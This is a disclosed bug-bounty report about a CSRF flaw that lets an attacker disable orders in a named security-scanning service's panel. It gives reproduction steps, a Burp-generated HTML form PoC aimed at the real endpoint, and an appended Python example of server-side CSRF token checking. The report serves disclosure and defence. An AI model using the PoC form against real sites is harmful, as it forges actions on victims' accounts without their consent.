CSRF - Disabling orders at https://panel.stopthehacker.com/manage/disable-order/order/ID

Disclosed: 2014-07-19 08:43:50 By internetwache To stopthehacker
Vulnerability Details
Hi there, there's a CSRF which would allow an attacker to disable an order.

Host: https://panel.stopthehacker.com

# Steps to reproduce:

1. Login to the panel.
2. Subscribe/order a new scan.
3. Go to the Billing page and get the order ID.
4. Put the order id in the PoC below and submit it.
5. The order will be disabled now.
6. Same procedure should work for enabling a service.

An attacker would need to guess the order ID by sending some (a lot of) requests.

# PoC:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://panel.stopthehacker.com/manage/disable-order/order/240720" method="POST">
      <input type="hidden" name="reason" value="Other" />
      <input type="hidden" name="otherReason" value="&#45;" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

You may need to adjust your order ID in the url.

# How to fix?

Add a CSRF token and validate it on the server.

Thanks,
Sebastian
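The server-side fix the report asks for, as an added example that is not part of the report or of the panel's own code: a synchronizer token tied to the user's session, checked before the disable-order handler changes any state. The session store, form dict and handler are simplified stand-ins.

```python
# Added example: per-session CSRF token for a state-changing endpoint such as
# POST /manage/disable-order/order/<order_id>. Not the panel's real code.
import hashlib
import hmac
import secrets
from typing import Optional, Tuple

SECRET_KEY = secrets.token_bytes(32)  # server-side secret, constructed at startup


def issue_csrf_token(session: dict) -> str:
    """Return the token to embed as a hidden form field for this session.

    The token is an HMAC over a random per-session nonce. A cross-site form
    cannot read the victim's page (same-origin policy), so it cannot supply
    the correct value, while the legitimate form the server renders can."""
    if "csrf_nonce" not in session:
        session["csrf_nonce"] = secrets.token_hex(16)
    return hmac.new(SECRET_KEY, session["csrf_nonce"].encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session: dict, submitted: Optional[str]) -> bool:
    """Reject missing tokens and compare in constant time to avoid timing leaks."""
    if not submitted or "csrf_nonce" not in session:
        return False
    return hmac.compare_digest(issue_csrf_token(session), submitted)


def disable_order(session: dict, form: dict, order_id: int, orders: dict) -> Tuple[int, str]:
    """Handler stand-in: only mutates state once the token check has passed."""
    if not csrf_token_valid(session, form.get("csrf_token")):
        return 403, "CSRF token missing or invalid"
    if order_id not in orders:
        return 404, "no such order"
    orders[order_id]["enabled"] = False
    return 200, "order %d disabled (reason: %s)" % (order_id, form.get("reason", ""))
```

A forged request shaped like the PoC form above carries no `csrf_token` field, so it is refused with 403 before the order is touched; only the form the panel rendered for that session can pass the check.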
Report Stats
  • Report ID: 8843
  • State: Closed
  • Substate: informative
  • Upvotes: 2